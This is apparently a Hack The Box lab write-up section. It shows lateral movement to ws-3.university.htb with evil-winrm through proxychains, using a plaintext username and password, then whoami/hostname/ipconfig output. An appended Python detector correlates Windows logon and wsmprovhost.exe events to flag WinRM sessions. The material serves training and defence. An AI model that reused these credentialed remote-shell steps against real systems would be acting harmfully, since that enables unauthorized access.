WinRM


During pivoting, the ws-3.university.htb host was found to have port 5985 open, running a WinRM service.

┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ sudo proxychains4 -q evil-winrm -i ws-3.university.htb -u wao -p 'WebAO1337'
 
Evil-WinRM shell v3.6
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\wao\Documents> whoami
university\wao
*Evil-WinRM* PS C:\Users\wao\Documents> hostname
WS-3
*Evil-WinRM* PS C:\Users\wao\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet 3:
 
   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::349:6988:18c6:65c6%8
   IPv4 Address. . . . . . . . . . . : 192.168.99.2
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
 

Lateral movement to the ws-3.university.htb host was made as the wao user via WinRM while pivoting. An initial foothold is established on the ws-3.university.htb host.
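
From the defender's side, a WinRM session like the one above leaves a network logon (Security event 4624, logon type 3) followed by a wsmprovhost.exe process creation (event 4688) on the target. The following is an added example, not part of the original write-up, that correlates the two over constructed, simplified records; the field names, source addresses, timestamps, the helpdesk account and the approved-host list are assumptions.

```python
import ipaddress
from datetime import datetime, timedelta

WINRM_HOST = "\\wsmprovhost.exe"   # process that hosts a remote PowerShell session
WINDOW = timedelta(seconds=30)     # assumption: host process starts soon after logon

# Constructed, simplified records (field names are hypothetical, not raw event XML).
EVENTS = [
    # Network logon followed by wsmprovhost.exe from a non-management address.
    {"id": 4624, "time": "2025-01-01T10:00:00", "host": "WS-3", "user": "wao",
     "logon_type": 3, "logon_id": "0x1a2b", "src_ip": "192.168.99.1"},
    {"id": 4688, "time": "2025-01-01T10:00:02", "host": "WS-3", "user": "wao",
     "logon_id": "0x1a2b", "image": r"C:\Windows\System32\wsmprovhost.exe"},
    # Same pattern from the approved management host.
    {"id": 4624, "time": "2025-01-01T11:00:00", "host": "WS-3", "user": "helpdesk",
     "logon_type": 3, "logon_id": "0x2c3d", "src_ip": "192.168.99.10"},
    {"id": 4688, "time": "2025-01-01T11:00:01", "host": "WS-3", "user": "helpdesk",
     "logon_id": "0x2c3d", "image": r"C:\Windows\System32\wsmprovhost.exe"},
    # Network logon with no WinRM host process (for example a file share access).
    {"id": 4624, "time": "2025-01-01T12:00:00", "host": "WS-3", "user": "wao",
     "logon_type": 3, "logon_id": "0x3e4f", "src_ip": "192.168.99.1"},
]
APPROVED = ["192.168.99.10"]       # assumption: the only host allowed to use WinRM


def find_winrm_sessions(events, approved_sources):
    """Return (host, user, src_ip) for WinRM sessions from unapproved sources."""
    approved = {ipaddress.ip_address(a) for a in approved_sources}
    logons = {}                    # (host, logon_id) -> network logon record
    hits = []
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (ev["host"], ev["logon_id"])
        if ev["id"] == 4624 and ev.get("logon_type") == 3:
            logons[key] = ev
        elif ev["id"] == 4688 and ev["image"].lower().endswith(WINRM_HOST):
            logon = logons.get(key)
            if logon is None:
                continue           # process without a matching network logon
            delta = datetime.fromisoformat(ev["time"]) - datetime.fromisoformat(logon["time"])
            if delta <= WINDOW and ipaddress.ip_address(logon["src_ip"]) not in approved:
                hits.append((logon["host"], logon["user"], logon["src_ip"]))
    return hits


if __name__ == "__main__":
    for host, user, src in find_winrm_sessions(EVENTS, APPROVED):
        print(f"WinRM session on {host} as {user} from unapproved source {src}")
```
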